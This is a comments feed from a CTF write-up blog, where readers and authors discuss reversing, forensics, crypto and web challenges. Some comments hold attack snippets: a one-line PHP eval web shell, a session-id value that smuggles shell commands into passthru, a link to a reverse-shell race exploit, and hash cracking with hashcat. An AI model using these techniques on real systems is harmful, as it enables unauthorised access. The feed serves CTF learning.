Comments for 0x90r00t https://0x90r00t.com 0x90r00t, 0x90r00f Tue, 01 Oct 2024 08:09:58 +0000 hourly 1 https://wordpress.org/?v=6.6.2 Comment on [eCSI 2015] Level 3 User+Root Write-up by pel0tas https://0x90r00t.com/2015/08/21/ecsi-2015-level-3-user-root-write-up/#comment-362 Fri, 04 Sep 2015 07:56:34 +0000 https://0x90r00t.com/?p=670#comment-362 overlayfs exploit its running for this linux version 😀

]]>
Comment on [MMA 2015] [Reverse – How to use?] Write Up by Tsuka https://0x90r00t.com/2015/09/07/mma-2015-reverse-how-to-use-write-up/#comment-506 Tue, 08 Sep 2015 14:11:01 +0000 https://0x90r00t.com/?p=794#comment-506 Hello. it was very difficult for me. Could i ask question? how to call the all functions and convert this numbers 77 77 65 123 102 99 55 100 57 48 99 97 48 48 49 102 99 56 55 49 50 52 57 55 100 56 56 100 57 101 101 55 101 102 97 57 101 57 98 51 50 101 100 56 125. please explain more and more?

]]>
Comment on [MMA 2015] [Reverse – How to use?] Write Up by WtF https://0x90r00t.com/2015/09/07/mma-2015-reverse-how-to-use-write-up/#comment-531 Tue, 08 Sep 2015 22:23:34 +0000 https://0x90r00t.com/?p=794#comment-531 In reply to Tsuka.

Hello Tsuka 🙂
In fact you can simply parse the decompiled C code.
You don’t need to call the functions from outside.
1) Sort all the variables v2, v3, v4 etc.. as I did.
2) For each variable there’s a function called, which will return a value.
I’ll take another more detailed example, not in my cropped source code :
v22 = sub_6FAC10B0; //Here v22 = the variable, sub_6FAC10B0 is the function
If you search the function named sub_6FAC10B0 in your decompiled code, you’ll find :
signed int sub_6FAC10B0()
{
return 50;
}

The final value of the variable v22 will be 50.
3) The function returns an integer (notice the “signed int” before the name).
It’s not a binary value and there are no letters A-F, so it can only be a decimal form.
You have to take the value the 50 and convert it in ASCII which gives 2.
v22 = 2; //50 in decimal.
4) When you have all the numbers, pass theses to a converter from decimal to ASCII.
This is an explanation of my code in python :
– it splits the string with all the values you gave it
– for each number it converts it in an ASCII value
– prints the final ASCII string

I hope it will be easier to understand now 🙂

]]>
Comment on [MMA 2015] [Reverse – How to use?] Write Up by Info https://0x90r00t.com/2015/09/07/mma-2015-reverse-how-to-use-write-up/#comment-536 Wed, 09 Sep 2015 00:14:52 +0000 https://0x90r00t.com/?p=794#comment-536 Hello, I’m a beginner with CTFs, which compiler did you use? I was messing around with IDA Pro and I saw the same fnhowtouse but I never put the pieces together. Which compiler did you use?

]]>
Comment on [MMA 2015] [Reverse – How to use?] Write Up by sudhackar https://0x90r00t.com/2015/09/07/mma-2015-reverse-how-to-use-write-up/#comment-546 Wed, 09 Sep 2015 07:37:23 +0000 https://0x90r00t.com/?p=794#comment-546 In reply to Info.

Exactly what decompiler did you use? I’m a beginner and would like to have proper tools from the start. I used ret-dec and it didn’t give me the proper ascii.

]]>
Comment on [MMA 2015] [Reverse – How to use?] Write Up by Hackndo https://0x90r00t.com/2015/09/07/mma-2015-reverse-how-to-use-write-up/#comment-549 Wed, 09 Sep 2015 10:26:39 +0000 https://0x90r00t.com/?p=794#comment-549 In reply to sudhackar.

We commonly use IDA Pro for reversing and decompiling. WtF did this challenge, but given his decompiling result, I would assume he used IDA.
(I’ll let him confirm though)

]]>
Comment on [MMA 2015] [Reverse – How to use?] Write Up by WtF https://0x90r00t.com/2015/09/07/mma-2015-reverse-how-to-use-write-up/#comment-554 Wed, 09 Sep 2015 11:51:00 +0000 https://0x90r00t.com/?p=794#comment-554 In reply to Hackndo.

Yes I used IDA 🙂
You can also decompile the DLL with :
Hopper
– the Capstone engine + a python decompiler script
radeco

]]>
Comment on [MMA 2015] [Reverse – How to use?] Write Up by Info https://0x90r00t.com/2015/09/07/mma-2015-reverse-how-to-use-write-up/#comment-572 Wed, 09 Sep 2015 22:28:08 +0000 https://0x90r00t.com/?p=794#comment-572 In reply to WtF.

From IDA, how did you get the result to look so “readable”. Mine mostly came out with assembly commands.

]]>
Comment on [MMA 2015] [Reverse – How to use?] Write Up by WtF https://0x90r00t.com/2015/09/07/mma-2015-reverse-how-to-use-write-up/#comment-578 Wed, 09 Sep 2015 23:36:32 +0000 https://0x90r00t.com/?p=794#comment-578 In reply to Info.

You have to use the decompiler (and not just stay in disassembler mode) :
File / Produce file / Create C file…

If you haven’t all the returned int values in the file, you have to attach the DLL to rundll32.exe:
– Choose windbg as debugger
– Debugger / Process options…
– Application : rundll32.exe

As example:
howtouse_without_windbg.txt
howtouse_with_windbg.txt

]]>
Comment on [MMA 2015] [Reverse – How to use?] Write Up by Tsuka https://0x90r00t.com/2015/09/07/mma-2015-reverse-how-to-use-write-up/#comment-583 Thu, 10 Sep 2015 07:28:43 +0000 https://0x90r00t.com/?p=794#comment-583 In reply to WtF.

Thank you very Much.

]]>
Comment on [MMA 2015] [Web – Uploader] Write Up by Tsuka https://0x90r00t.com/2015/09/08/mma-2015-web-uploader-write-up/#comment-584 Thu, 10 Sep 2015 09:45:08 +0000 https://0x90r00t.com/?p=887#comment-584 Hello What was the your last uploaded file. test.txt including eval($_GET[‘q’]); ?

]]>
Comment on [MMA 2015] [Web – Uploader] Write Up by winw https://0x90r00t.com/2015/09/08/mma-2015-web-uploader-write-up/#comment-587 Thu, 10 Sep 2015 11:02:43 +0000 https://0x90r00t.com/?p=887#comment-587 In reply to Tsuka.

Hi,
It was a .php file with the content:
<script language=PHP>eval($_GET['q']);</script>

]]>
Comment on [MMA 2015] [Forensics – stream…] Write Up by Diaa https://0x90r00t.com/2015/09/07/mma-2015-forensics-stream-write-up/#comment-619 Fri, 11 Sep 2015 10:45:56 +0000 https://0x90r00t.com/?p=758#comment-619 When i renamed stream-data.hex to stream-data.pcap , the wireshark failed to open the file.

]]>
Comment on [MMA 2015] [Forensics – stream…] Write Up by WtF https://0x90r00t.com/2015/09/07/mma-2015-forensics-stream-write-up/#comment-620 Fri, 11 Sep 2015 11:14:20 +0000 https://0x90r00t.com/?p=758#comment-620 In reply to Diaa.

Hello Diaa
Strange, I tried what I wrote in the WU, and it’s working fine:
– Download the .zip archive from the link above.
– Extract the “stream” file.
– Open it with Wireshark.

]]>
Comment on [MMA 2015] [Forensics – stream…] Write Up by Diaa https://0x90r00t.com/2015/09/07/mma-2015-forensics-stream-write-up/#comment-622 Fri, 11 Sep 2015 11:23:02 +0000 https://0x90r00t.com/?p=758#comment-622 yup, works fine, i did’t know what happen with me, but now everything is fine now, Thanks WTF for your attention and really i liked your simplicity in all your blogs.

]]>
Comment on [MMA 2015] [Forensics – stream…] Write Up by WtF https://0x90r00t.com/2015/09/07/mma-2015-forensics-stream-write-up/#comment-625 Fri, 11 Sep 2015 13:37:36 +0000 https://0x90r00t.com/?p=758#comment-625 In reply to Diaa.

You’re welcome!
We try at most to popularize how to solve the challenges.
It’s good to know that the goal seems reached!
Thank you 🙂

]]>
Comment on [eCSI 2015] Level 3 User+Root Write-up by WtF https://0x90r00t.com/2015/08/21/ecsi-2015-level-3-user-root-write-up/#comment-626 Fri, 11 Sep 2015 17:45:11 +0000 https://0x90r00t.com/?p=670#comment-626 In reply to pel0tas.

Mhh I’m quite sure for having tried it … however it should not :/
By the way pel0tas, do you have full write-ups for the other levels? :p

]]>
Comment on [MMA 2015] [Crypto/Warmup – Smart Cipher System] Write Up by Raizen https://0x90r00t.com/2015/09/07/mma-2015-cryptowarmup-smart-cipher-system-write-up/#comment-630 Sat, 12 Sep 2015 07:58:03 +0000 https://0x90r00t.com/?p=806#comment-630 Hi you. Thank you your writeup .
Hope you can write more and more .
Thank you.

]]>
Comment on [MMA 2015] [Crypto/Warmup – Smart Cipher System] Write Up by WtF https://0x90r00t.com/2015/09/07/mma-2015-cryptowarmup-smart-cipher-system-write-up/#comment-635 Sat, 12 Sep 2015 21:02:51 +0000 https://0x90r00t.com/?p=806#comment-635 In reply to Raizen.

This will depend on CTF organizers!
And…in fact we must thank them too 🙂

]]>
Comment on [MITRE STEM 2015] [Crypto 100 – Gravity Falls] Write Up by K https://0x90r00t.com/2015/09/14/mitre-stem-2015-crypto-100-gravity-falls-write-up/#comment-679 Tue, 15 Sep 2015 06:54:05 +0000 https://0x90r00t.com/?p=998#comment-679 http://gravityfalls.wikia.com/wiki/List_of_cryptograms#Author.27s_symbol_substitution_cipher
Why I follow this cipher and decode it as: MCA DASH FOUR TWO SIX NINE SIX C SIX C
Submit flag MCA-42696c6c and I got point, too?

]]>
Comment on [MITRE STEM 2015] [Crypto 100 – Gravity Falls] Write Up by Nodulaire https://0x90r00t.com/2015/09/14/mitre-stem-2015-crypto-100-gravity-falls-write-up/#comment-680 Tue, 15 Sep 2015 08:07:04 +0000 https://0x90r00t.com/?p=998#comment-680 In reply to K.

The flag has changed during the night because somoene leaked the original one on IRC.

]]>
Comment on [MITRE STEM 2015] [Cyberville 500] Write Up by Al5bier https://0x90r00t.com/2015/09/15/mitre-stem-2015-cyberville-500-write-up/#comment-689 Tue, 15 Sep 2015 18:46:13 +0000 https://0x90r00t.com/?p=981#comment-689 Can you feed us with option argumments that used with binwalk

]]>
Comment on [EKOPARTY PRE-CTF 2015] Back on the event by abdillah https://0x90r00t.com/2015/09/18/ekoparty-pre-ctf-2015-back-on-the-event/#comment-881 Sat, 19 Sep 2015 17:03:45 +0000 https://0x90r00t.com/?p=1068#comment-881 wow , good job man
i am waiting the writeups 😀

]]>
Comment on [Cybercamp 2015] [Exploit 1] Write Up by GinGin https://0x90r00t.com/2015/08/04/cybercamp-2015-exploit-1-write-up/#comment-882 Sat, 19 Sep 2015 19:20:09 +0000 https://0x90r00t.com/?p=655#comment-882 It challenges still online, or it have repository on github

]]>
Comment on [Cybercamp 2015] [Exploit 1] Write Up by WtF https://0x90r00t.com/2015/08/04/cybercamp-2015-exploit-1-write-up/#comment-898 Sun, 20 Sep 2015 23:49:49 +0000 https://0x90r00t.com/?p=655#comment-898 Hello,
I added a link to the binary in the post 🙂
Have fun!

]]>
Comment on [EKOPARTY PRE-CTF 2015] Back on the event by WtF https://0x90r00t.com/2015/09/18/ekoparty-pre-ctf-2015-back-on-the-event/#comment-899 Sun, 20 Sep 2015 23:54:11 +0000 https://0x90r00t.com/?p=1068#comment-899 In reply to abdillah.

Hello!
Write ups are coming 🙂
EKO admins asked to do NOT post solutions until monday.
(The first teams needs to prove their validations)

]]>
Comment on [MITRE STEM 2015] [Cyberville 500] Write Up by WtF https://0x90r00t.com/2015/09/15/mitre-stem-2015-cyberville-500-write-up/#comment-900 Sun, 20 Sep 2015 23:58:32 +0000 https://0x90r00t.com/?p=981#comment-900 In reply to Al5bier.

Hello!
As it was useless, I didn’t kept any log for this.
I’m quite sure having used binwalk with the options -e -M.
Maybe the firmware mod kit too!

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev200 – Reversing the APC cache] Write Up by good https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev200-reversing-the-apc-cache-write-up/#comment-951 Tue, 22 Sep 2015 02:03:06 +0000 https://0x90r00t.com/?p=1163#comment-951 wow, thank you so much!

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev100 – MOV] Write Up by Tsuka https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev100-mov-write-up/#comment-990 Thu, 24 Sep 2015 10:09:21 +0000 https://0x90r00t.com/?p=1146#comment-990 Hello Team, Thank you for all time for Interesting Write Up.
Could i ask question? In this task, how to open MOV file with gdb?
i tried “(gdb) r MOV” and how to find breakpoint register? i have no experience with reverse engineering but i’m really want to learn about it.

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev100 – MOV] Write Up by Hackndo https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev100-mov-write-up/#comment-1010 Fri, 25 Sep 2015 07:46:49 +0000 https://0x90r00t.com/?p=1146#comment-1010 In reply to Tsuka.

Hey there !
Questions are welcome ! To answer yours, there are different possibilities to run a binary with gdb, but the easiest way is when you open gdb in your command line interface, you give it a parameter : your binary name. Once you are in gdb prompt, you can run your binary :

$ gdb MOV
(gdb) r

Regarding your second question about “breakpoint register”, I’m not sure I fully understand what you meant. Could you be a bit more specific, or could you quote the part in this write up that isn’t clear for you ?

If you have any other questions, please do not hesitate 🙂

See ya !

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev100 – MOV] Write Up by Tsuka https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev100-mov-write-up/#comment-1014 Fri, 25 Sep 2015 10:44:32 +0000 https://0x90r00t.com/?p=1146#comment-1014 Thank you very much Hackndo, i did following. and stuck in last line. how to continue from this condition? what is wrong?

unzip reversing100.zip
file MOV
chmod +x MOV
./MOV
gdb MOV
(gdb) r
(gdb) b *0x0804c2f9
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/MOV 
        __                              __          
  ____ |  | ______ ___________ ________/  |_ ___.__.
_/ __ \|  |/ /  _ \\____ \__  \\_  __ \   __<   |  |
\  ___/|    <  <_> )  |_> > __ \|  | \/|  |  \___  |
 \___  >__|_ \____/|   __(____  /__|   |__|  / ____|
     \/     \/     |__|       \/             \/     

Processing...
Error


Breakpoint 1, 0x0804c2f9 in ?? ()
]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev100 – MOV] Write Up by Hackndo https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev100-mov-write-up/#comment-1015 Fri, 25 Sep 2015 13:24:56 +0000 https://0x90r00t.com/?p=1146#comment-1015 In reply to Tsuka.

Hey, we have different outputs because I’m using peda (https://github.com/longld/peda).

This is how it’s done without it :

$ gdb -q MOV
Reading symbols from MOV...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/hackndo/MOV 
  
[...]

Processing...
Error


Program received signal SIGILL, Illegal instruction.
0x0804c2f9 in ?? ()

Ok, it stops at 0x0804c2f9. As I said in my write up, I placed a breakpoint right *before* this instruction, at 0x804c2f3 :

(gdb) b *0x804c2f3
Breakpoint 1 at 0x804c2f3
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hackndo/MOV 

[...]

Processing...
Error


Breakpoint 1, 0x0804c2f3 in ?? ()

Ok, let’s take a look at the stack

(gdb) x/16xw $esp
0x85f6660:  0x0804d3d0  0x5f6c6c41  0x5f756f59  0x6465654e
0x85f6670:  0x5f73495f  0x0076306d  0x00000000  0x00000000
0x85f6680:  0x00000000  0x00000000  0x00000000  0x00000000
0x85f6690:  0x085f66a0  0x88048563  0x00000001  0xffffd0b4

First value looks like an address, next values look like ascii char. Let’s see this :

(gdb) x/s 0x0804d3d0
0x804d3d0:  "Error\n\n"
(gdb) x/s $esp+0x4
0x85f6664:  "All_You_Need_Is_m0v"
(gdb)

And here is the flag. But I’m going to say this again : This was a lucky guess, because we didn’t solve this as expected. We only got lucky. You should take a look at other reverse write up to see how it’s really done. 🙂

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev100 – MOV] Write Up by Tsuka https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev100-mov-write-up/#comment-1016 Fri, 25 Sep 2015 14:43:00 +0000 https://0x90r00t.com/?p=1146#comment-1016 Thank you very much

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev100 – MOV] Write Up by Hackndo https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev100-mov-write-up/#comment-1017 Fri, 25 Sep 2015 14:57:29 +0000 https://0x90r00t.com/?p=1146#comment-1017 In reply to Tsuka.

You’re most welcome !

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Web200 – Safebox] Write Up by bef0rd https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-web200-safebox-write-up/#comment-1030 Sat, 26 Sep 2015 03:28:47 +0000 https://0x90r00t.com/?p=1174#comment-1030 Glad that you liked my challenge, nice to see you guys suffered a little with it 😀
Hope to see on the final CTF too!

]]>
Comment on [eCSI 2015] Level 1 User Write-up by Tsuka https://0x90r00t.com/2015/08/21/ecsi-2015-level-1-user-write-up/#comment-1057 Sun, 27 Sep 2015 09:44:27 +0000 https://0x90r00t.com/?p=661#comment-1057 Hello dear, how do you brute force & which tools are you used? if it is not secret please share me. i’m also want decrypt it ” $H$9qjoQsN1nh3.bA/ek8d7G7QfWwyE2T0 ” and learn.

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Web200 – Safebox] Write Up by The lsd https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-web200-safebox-write-up/#comment-1062 Mon, 28 Sep 2015 08:12:42 +0000 https://0x90r00t.com/?p=1174#comment-1062 In reply to bef0rd.

We like to suffer 🙂
If there is as good challenges as this one, maybe we’ll try the final CTF 😉

]]>
Comment on [Trend Micro 2015] [Analysis-offensive 100] Write-Up by deadbeef https://0x90r00t.com/2015/09/28/trend-micro-2015-analysis-offensive-100-write-up/#comment-1069 Mon, 28 Sep 2015 18:58:07 +0000 https://0x90r00t.com/?p=1361#comment-1069 You’re really nice 🙂

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Web100 – Protocols] Write Up by rea https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-web100-protocols-write-up/#comment-1478 Thu, 15 Oct 2015 06:48:43 +0000 https://0x90r00t.com/?p=1084#comment-1478 hello, 0x90r00t, nice write ups.
btw, i wondered how you guys know about this ctf?. me and my friends check ctftime.org but this ctf ‘s infromation never posted there. thats why we couldnt participated this ctf. sorry my bad english.

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev200 – Reversing the APC cache] Write Up by newland https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev200-reversing-the-apc-cache-write-up/#comment-1503 Fri, 16 Oct 2015 02:44:30 +0000 https://0x90r00t.com/?p=1163#comment-1503 Hi, i tried to install PHP 5.4.45 and APC 3.1.13, but I cannot import “cache.data”, i got error “Segmentation fault”.
What is the OS version you used ? Can you give some detail of your command to install ?
Thanks,

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev200 – Reversing the APC cache] Write Up by winw https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev200-reversing-the-apc-cache-write-up/#comment-1524 Fri, 16 Oct 2015 13:30:55 +0000 https://0x90r00t.com/?p=1163#comment-1524 In reply to newland.

Hi,

I have compiled myself both PHP 5.4.45 and APC 3.1.13 on ubuntu 15.04 x64.
If you get segmentation fault, make sure you have not version conflicts (eg: used system phpize instead of freshly compiled 5.4 phpize when compiling APC)

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Web100 – Protocols] Write Up by WtF https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-web100-protocols-write-up/#comment-1586 Sun, 18 Oct 2015 12:06:49 +0000 https://0x90r00t.com/?p=1084#comment-1586 In reply to rea.

Hello rea and thanks!
I think it was probably known through word of mouth then 🙂

]]>
Comment on [eCSI 2015] Level 1 User Write-up by WtF https://0x90r00t.com/2015/08/21/ecsi-2015-level-1-user-write-up/#comment-1587 Sun, 18 Oct 2015 12:12:22 +0000 https://0x90r00t.com/?p=661#comment-1587 Hello Tsuka, sorry for answering late.
You can use oclHashcat with hash-mode 400 and the rockyou.txt dictionnary.

Hash-Mode | Hash-Name           | Example
400       | phpass, MD5(phpBB3) | $H$984478476IagS59wHZvyQMArzfx58u.

Source: https://hashcat.net/wiki/doku.php?id=example_hashes
(Moreover a hint was given with a link to “Queen – We will rock you” :D)

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Rev200 – Reversing the APC cache] Write Up by newland https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-rev200-reversing-the-apc-cache-write-up/#comment-1612 Mon, 19 Oct 2015 09:34:44 +0000 https://0x90r00t.com/?p=1163#comment-1612 In reply to winw.

Yeah, I can use it on Ubuntu 15.04 x64. Thank you 🙂

]]>
Comment on [Hackover 2015] Back on the event by Bas https://0x90r00t.com/2015/10/18/hackover-2015-back-on-the-event/#comment-1722 Thu, 22 Oct 2015 08:40:42 +0000 https://0x90r00t.com/?p=1473#comment-1722 Hi,

First of all congratulations with your scores.
Could you please write of tell me the writeup for the “simplepassword” challenge from hackover ctf. I came till the 4th or 5th part, but nu further.

Thank you in advance.

Greets Bas

]]>
Comment on [Hackover 2015] Back on the event by Ann https://0x90r00t.com/2015/10/18/hackover-2015-back-on-the-event/#comment-1748 Thu, 22 Oct 2015 23:19:56 +0000 https://0x90r00t.com/?p=1473#comment-1748 Same as Bas ! Please a write up !

]]>
Comment on [Trend Micro 2015] [Analysis-offensive 100] Write-Up by The lsd https://0x90r00t.com/2015/09/28/trend-micro-2015-analysis-offensive-100-write-up/#comment-1784 Fri, 23 Oct 2015 22:28:10 +0000 https://0x90r00t.com/?p=1361#comment-1784 In reply to deadbeef.

Thanks buddy 🙂

]]>
Comment on [Hackover 2015] Back on the event by Bartack https://0x90r00t.com/2015/10/18/hackover-2015-back-on-the-event/#comment-1927 Tue, 27 Oct 2015 15:13:09 +0000 https://0x90r00t.com/?p=1473#comment-1927 In reply to Bas.

Write up online for the challenge “simplepassword”. Greets.

]]>
Comment on [Hackover 2015] Back on the event by Bartack https://0x90r00t.com/2015/10/18/hackover-2015-back-on-the-event/#comment-1928 Tue, 27 Oct 2015 15:13:28 +0000 https://0x90r00t.com/?p=1473#comment-1928 In reply to Ann.

Write up online for the challenge “simplepassword”. Greets.

]]>
Comment on [9447 CTF 2015] [Web 200 – nicklesndimes] Write Up by acid https://0x90r00t.com/2015/11/30/9447-ctf-2015-web-200-nicklesndimes-write-up/#comment-2714 Mon, 30 Nov 2015 01:04:28 +0000 https://0x90r00t.com/?p=1545#comment-2714 hum. for me the X-Forwarded-For header wasn’t working, had to add the IP to the whitelist.

I found the following code in a .js that was included in the html (http://nicklesndimes-wq3mhu8l.9447.plumbing/js/mellivora.js):

function whitelist_ip(i,t){
  $.post("admin/actions/new_ip_whitelist",{action:"new",user_id:i,ip:t})
}

It was possible to execute whitelist_ip( 1, YOUR_IP ); from the developer console when logged in with a regular user, then log out / login with admin => works!.

]]>
Comment on [9447 CTF 2015] [Web 200 – nicklesndimes] Write Up by WtF https://0x90r00t.com/2015/11/30/9447-ctf-2015-web-200-nicklesndimes-write-up/#comment-2715 Mon, 30 Nov 2015 01:26:51 +0000 https://0x90r00t.com/?p=1545#comment-2715 In reply to acid.

I tried to add my own IP with a XHR request from this JS like you said but was KO for me.
That’s why I finally used this header. 🙂
Maybe someone has later added the IP for 9447.plumbing and I used it!
Thanks for the reply, good to see our ideas are never useless 😀

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Cry200 – Perfect security] Write Up by Niemand https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-cry200-perfect-security-write-up/#comment-3790 Wed, 13 Jan 2016 13:02:19 +0000 https://0x90r00t.com/?p=1313#comment-3790 Hello Alkanor,

I’m currently learning more about the CTF reading and learning from your posts. Therefore, I’d like to ask something about your code, because I can’t understand the way you did it.

if(crypted[i]<='9'&&crypted[i+1]<='9')
hex.push_back((crypted[i]-'0')*16+(crypted[i+1]-'0'));
else if(crypted[i]<='9')
hex.push_back((crypted[i]-'0')*16+(crypted[i+1]-'a'+10));
else if(crypted[i+1]<='9')
hex.push_back((crypted[i]-'a'+10)*16+(crypted[i+1]-'0'));
else
hex.push_back((crypted[i]-'a'+10)*16+(crypted[i+1]-'a'+10));

I really don't understand why you are taking two numbers and comparing them to '9'. If you could explain my how it works I would really appreciate it.

Second, why the golden number size is shorter than the output.enc? Shouldn't be the same size or longer?

Best,
Niemand

]]>
Comment on [EKOPARTY PRE-CTF 2015] [Cry200 – Perfect security] Write Up by Alkanor https://0x90r00t.com/2015/09/20/ekoparty-pre-ctf-2015-cry200-perfect-security-write-up/#comment-3920 Mon, 18 Jan 2016 20:04:44 +0000 https://0x90r00t.com/?p=1313#comment-3920 In reply to Niemand.

Hi Niemand,

the crypted text is composed of letters from a to z and of digits from 0 to 9 (or maybe I converted it, I don’t remember honestly). That’s why I use a comparaison with ‘9’ : when char is not <= '9', we can be sure it is located between 'a' and 'f'. Basically the code you mentioned is a conversion from 'xx' (2 hex string) to char.
(for instance, '10' is converted to char 16, 'a2' is converted to char 162, …)

Secondly, I chose the golden number size in order to have a valid file at the end of the process, so that can explain it isn't exactly the same size as output.enc (I modified it a posteriori).

Hope it's understandable,
best,
Alkanor

]]>
Comment on [HackIM 2016] [Web 400 – SmashTheState] Write Up by hehehe https://0x90r00t.com/2016/02/03/hackim-2016web-400-smashthestate-write-up/#comment-4224 Wed, 03 Feb 2016 17:21:30 +0000 https://0x90r00t.com/?p=1690#comment-4224 how to attack symlink 🙂

]]>
Comment on [HackIM 2016] [Web 400 – SmashTheState] Write Up by hehehe https://0x90r00t.com/2016/02/03/hackim-2016web-400-smashthestate-write-up/#comment-4225 Wed, 03 Feb 2016 17:34:59 +0000 https://0x90r00t.com/?p=1690#comment-4225 how to view /etc/passwd i don’t know …

]]>
Comment on [HackIM 2016] [Web 400 – SmashTheState] Write Up by KiFastSystemCallRet https://0x90r00t.com/2016/02/03/hackim-2016web-400-smashthestate-write-up/#comment-4233 Thu, 04 Feb 2016 08:29:41 +0000 https://0x90r00t.com/?p=1690#comment-4233 so couldn’t you execute command by changing $tmp_file ?
my mean is change your session_id to “aaaa;ls -la;cat /”
so the tmp_file should be
$tmp_file = ‘/var/www/html/tmp/upload_aaaa;ls -la;cat /’;

passthru(“cat /var/www/html/tmp/upload_aaaa;ls -la;cat /* 2>&1”);

]]>
Comment on [HackIM 2016] [Web 400 – SmashTheState] Write Up by an0n https://0x90r00t.com/2016/02/03/hackim-2016web-400-smashthestate-write-up/#comment-4236 Thu, 04 Feb 2016 09:39:18 +0000 https://0x90r00t.com/?p=1690#comment-4236 the challenge was unsolvable in almost all of the time. someone modified the sudoer file to restrict passwordless sudo access. btw, here is my simple race condition exploit to get a reverse shell:
http://pastebin.com/4wsSGPTK

the sudoer restriction:
http://pastebin.com/wdM64Grv

the timestamp of sudoer file:
-r–r—– 1 root root 786 Jan 30 12:02 sudoers
$ date
Sun Jan 31 12:46:48 UTC 2016

unfortunately the organizers didn’t deal with this (despite my request).

]]>
Comment on [HackIM 2016] [Web 400 – SmashTheState] Write Up by The lsd https://0x90r00t.com/2016/02/03/hackim-2016web-400-smashthestate-write-up/#comment-4245 Thu, 04 Feb 2016 19:42:51 +0000 https://0x90r00t.com/?p=1690#comment-4245 In reply to KiFastSystemCallRet.

Actually, I don’t think it would have worked, as there is “if (isset($_SESSION[‘user’])” before the upload.
If you change your session id, the PHP will not recognise you anymore and you’ll not be able to upload, and then to inject your commands in the passthru.

Enjoy

The lsd

]]>
Comment on [HackIM 2016] [Web 400 – SmashTheState] Write Up by The lsd https://0x90r00t.com/2016/02/03/hackim-2016web-400-smashthestate-write-up/#comment-4246 Thu, 04 Feb 2016 19:49:48 +0000 https://0x90r00t.com/?p=1690#comment-4246 In reply to an0n.

I did it on saturday afternoon GMT+1, it worked fine, excepted that the flag file was readable only some times. I had to reload my sudo cat multiple times to have the file content.

Maybe someone else was trying to modify the sudo at the same time.

(Just in case, that wasn’t me who stucked the challenge ^^’, I think it stupid…)

Enjoy

The lsd

]]>
Comment on [Sharif University CTF 2016] [Web 250 – Old persian cuneiform captcha] Write Up by icheernoom https://0x90r00t.com/2016/02/07/sharif-university-ctf-2016-web-250-old-persian-cuneiform-captcha-write-up/#comment-4345 Tue, 09 Feb 2016 15:34:07 +0000 https://0x90r00t.com/?p=1880#comment-4345 Nice write-up!

]]>
Comment on [Internetwache CTF 2016] Back on the event by Khanh Ta Quang https://0x90r00t.com/2016/02/22/internetwache-ctf-2016-back-on-the-event/#comment-4613 Mon, 22 Feb 2016 12:02:07 +0000 https://0x90r00t.com/?p=2097#comment-4613 COngratz!

]]>
Comment on [Google Capture The Flag 2016] [Forensics 250 – No Big Deal Part 2] Write Up by 5566theBest https://0x90r00t.com/2016/05/02/google-capture-the-flag-2016-forensics-250-no-big-deal-part-2-write-up/#comment-6398 Tue, 24 May 2016 09:27:32 +0000 https://0x90r00t.com/?p=2368#comment-6398 wow great job, it is the simplest solution I learned.
I stuck on line 3 : strings * | grep -i ‘ctf’.
The result I get is a bunch of “d%CTF”.
I mean how did you parse the result into CTF{….etc.
Thanks in advance.

]]>
Comment on [NDH 2016] [FORENSICS 200 – I’M AFRAID OF A GH0ST NAMED POISON IVY] Write Up by majinboo https://0x90r00t.com/2016/07/08/ndh-2016forensics-200-im-afraid-of-a-gh0st-named-poison-ivy-write-up/#comment-7141 Sun, 10 Jul 2016 17:25:23 +0000 https://0x90r00t.com/?p=2541#comment-7141 Nice write-up, I confirm that the flag at the end of the write-up is the correct one.

]]>
Comment on [NDH 2016] [FORENSICS 200 – I’M AFRAID OF A GH0ST NAMED POISON IVY] Write Up by nicolas zilio https://0x90r00t.com/2016/07/08/ndh-2016forensics-200-im-afraid-of-a-gh0st-named-poison-ivy-write-up/#comment-7162 Mon, 11 Jul 2016 21:21:44 +0000 https://0x90r00t.com/?p=2541#comment-7162 Ah nice guys!

i would like to apologize, i have just checked it tonight, and in my client/server implementation i still used my previous send_test function (so not the final one) to make that pcap file (eheh comment). Hence, the double \x78\x9c is indeed not correct, and at the third packet, i wanted to reproduce the structure of payload, but instead of DWORD,i used to put a single byte… Glad you got it with my mistakes (i will get you some beer!)

just a note: the junk you get at the end is due to the length you use for decrypt, you have a key of 32 bytes, and you make the decrypt on a length of 64 bytes (so on some undetermined data). By the way, the 0x20 acting for payload length in the third packet was here to say it’s 32 bytes long.

another note: on the stegano chall, the strings command on the image returns “code rate is 0.571”, that would have been the hint for the size of generator matrix used.

regards,
Big5

]]>
